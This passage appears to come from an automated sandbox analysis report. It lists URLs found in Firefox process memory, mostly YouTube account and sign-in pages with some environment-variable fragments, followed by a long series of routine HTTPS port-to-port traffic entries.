Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2794491755.0000016DCE8D5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3295117428.00000221E2134000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3295117428.00000221E2130000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3292463596.0000022B01654000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3282362582.0000022B012EA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3282362582.0000022B012E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3292463596.0000022B01650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account
Source: firefox.exe, 00000020.00000002.2795766765.00000260EA7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account--attempting-deelevation
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account9
Source: firefox.exe, 00000021.00000003.2794491755.0000016DCE8FB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3295117428.00000221E2134000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3295117428.00000221E2130000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3292463596.0000022B01654000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3282362582.0000022B012E0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3292463596.0000022B01650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user
Source: firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCS
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=alfon
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr	String found in binary or memory: https://www.youtube.com/accountmoc.ebutuoy.www.
Source: firefox.exe, 00000021.00000003.3204676713.0000016DE9EA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3203589394.0000016DEA3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526n
Source: firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000021.00000003.2970407421.0000016DDF242000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2887374046.0000016DDF0C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000021.00000003.2970407421.0000016DDF2C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2883300923.0000016DDF2C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF2C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 64318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 64238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 64285 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64365 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 64307 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 64203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 64342 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 64319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64375 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 64364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 64068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 64045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 64366 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 64205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 64308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 64260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64355 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64261 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64354 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 64321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 64283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64332 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64333 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64344 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 64367 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 64149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 64287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 64206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64369 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64334 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64368 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64297 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64340
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64219
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64339
Source: unknown	Network traffic detected: HTTP traffic on port 64141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64332
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64331
Source: unknown	Network traffic detected: HTTP traffic on port 64061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64334
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64212
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64333
Source: unknown	Network traffic detected: HTTP traffic on port 64084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64336
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64335
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64338
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64216
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64337
Source: unknown	Network traffic detected: HTTP traffic on port 64176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64351
Source: unknown	Network traffic detected: HTTP traffic on port 64313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64229
Source: unknown	Network traffic detected: HTTP traffic on port 64267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64291 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64222
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64221
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64342
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64344
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64226
Source: unknown	Network traffic detected: HTTP traffic on port 64232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64228
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64349
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64227
Source: unknown	Network traffic detected: HTTP traffic on port 64324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64348
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64361
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64360
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64363
Source: unknown	Network traffic detected: HTTP traffic on port 64290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64362
Source: unknown	Network traffic detected: HTTP traffic on port 64095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64358 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64353
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64235
Source: unknown	Network traffic detected: HTTP traffic on port 64302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64356
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64355
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64358
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64357
Source: unknown	Network traffic detected: HTTP traffic on port 64199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64238
Source: unknown	Network traffic detected: HTTP traffic on port 64325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64370
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64372
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64250
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64132
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64373
Source: unknown	Network traffic detected: HTTP traffic on port 64336 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64365
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64364
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64246
Source: unknown	Network traffic detected: HTTP traffic on port 64347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64367
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64369
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64249
Source: unknown	Network traffic detected: HTTP traffic on port 64211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64307
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64306
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64309
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64308
Source: unknown	Network traffic detected: HTTP traffic on port 64062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64301
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64300
Source: unknown	Network traffic detected: HTTP traffic on port 64349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64303
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64305
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64304
Source: unknown	Network traffic detected: HTTP traffic on port 64278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64318
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64317
Source: unknown	Network traffic detected: HTTP traffic on port 64222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64319
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64310
Source: unknown	Network traffic detected: HTTP traffic on port 64063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64312
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64311
Source: unknown	Network traffic detected: HTTP traffic on port 64348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64313
Source: unknown	Network traffic detected: HTTP traffic on port 64210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64315
Source: unknown	Network traffic detected: HTTP traffic on port 64233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64330
Source: unknown	Network traffic detected: HTTP traffic on port 64096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64208
Source: unknown	Network traffic detected: HTTP traffic on port 64139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64329
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64328
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64209
Source: unknown	Network traffic detected: HTTP traffic on port 64244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64321
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64320
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64323
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64325
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64324
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64206
Source: unknown	Network traffic detected: HTTP traffic on port 64326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64327
Source: unknown	Network traffic detected: HTTP traffic on port 64360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64205
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64060
Source: unknown	Network traffic detected: HTTP traffic on port 64093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64065
Source: unknown	Network traffic detected: HTTP traffic on port 64282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64299
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64058
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64192
Source: unknown	Network traffic detected: HTTP traffic on port 64235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64193
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64197
Source: unknown	Network traffic detected: HTTP traffic on port 64338 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64373 -> 443
